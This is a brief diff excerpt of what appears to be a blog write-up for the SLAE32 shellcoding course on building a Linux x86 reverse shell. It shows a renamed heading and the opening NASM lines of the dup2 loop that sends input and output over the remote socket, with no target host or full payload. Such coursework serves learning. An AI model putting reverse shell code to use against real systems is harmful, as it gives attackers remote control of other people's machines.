boku7/boku7.github.io/_posts/2019-09-15-SLAE32_2_ReverseShell.md

 EAX       EBX      ECX
 ```

-`dup2()` Assembly Loop code to transfer input and output to the remote socket.
+#### Assembly Loop to transfer input and output to the remote socket.
 ```nasm
  xchg ebx, esi     ; This is our socket value returned from our `socket` systemcall. xor ecx, ecx      ; Clear the ECX Register